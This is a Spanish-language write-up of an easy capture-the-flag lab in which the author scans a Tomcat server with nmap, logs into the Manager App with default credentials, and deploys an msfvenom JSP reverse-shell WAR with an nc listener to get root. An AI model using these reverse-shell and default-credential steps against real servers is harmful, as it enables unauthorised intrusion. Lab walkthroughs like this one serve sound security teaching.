-Pn
✍️ Autor: El Pingüino de Mario🔍 Dificultad: Fácil 📅 Fecha de creación: 02/04/2024
Last updated
Was this helpful?
✍️ Autor: El Pingüino de Mario🔍 Dificultad: Fácil 📅 Fecha de creación: 02/04/2024
Last updated
Was this helpful?
Was this helpful?
En primer lugar, tras conectarnos a la máquina, utilizamos el comando:
ping -c 1 172.17.0.2
para verificar la conectividad de red.
A continuación, realizamos el comando:
nmap -sVC -p- -n --min-rate 5000 172.17.0.2
para realizar un escaneo de puertos y servicios detallado en la dirección IP.
Como podemos observar durante el escaneo que el puerto 8080 perteneciente al servicio HTTP está abierto por lo que a continuación se indagará más.
Se utiliza el comando:
sudo nmap -sCV -p8080 -v 172.17.0.2
para que nos proporcione más información sobre esos puertos específicamente.
Seguimos indagando más sobre los puertos y ahora indagamos sobre el servicio HTTP. Se ingresó la dirección IP en el navegador lo que llevó a que la página web sea un Apache Tomcat.
Vamos a Manager App y nos pide unas credenciales. A través de esta página nos indica las credenciales por defecto y cómo vulnerar esta versión. Las credenciales fueron tomcat:s3cr3t.
Subimos una Reverse Shell.
msfvenom -p java/jsp_shell_reverse_tcp LHOST=172.17.0.1 LPORT=443 -f war -o reverse.war
Nos ponemos en escucha.
nc -lvnp 443
Al estar dentro y ejecutar:
whoami
y somos root.